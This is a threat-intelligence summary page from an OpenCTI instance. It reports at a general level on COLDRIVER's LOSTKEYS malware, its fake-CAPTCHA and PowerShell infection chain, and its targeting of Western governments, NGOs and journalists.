Contact

COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs

NetmanageIT OpenCTI - opencti.netmanageit.com

COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs



SUMMARY :

Russian government-backed threat group COLDRIVER has developed a new malware called LOSTKEYS, capable of stealing files and system information. The group targets high-profile individuals, NGOs, and former intelligence officers through credential phishing and malware delivery. LOSTKEYS is delivered through a multi-step infection chain, starting with a fake CAPTCHA and involving PowerShell commands. The malware evades detection in VMs and uses a substitution cipher for decoding. COLDRIVER's primary goal is intelligence collection for Russia's strategic interests, targeting Western governments, militaries, journalists, and Ukraine-related individuals. The group has been linked to hack-and-leak campaigns in the UK and against NGOs.

OPENCTI LABELS :

powershell,phishing,credential theft,clickfix,spica,document theft,lostkeys,ngos


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs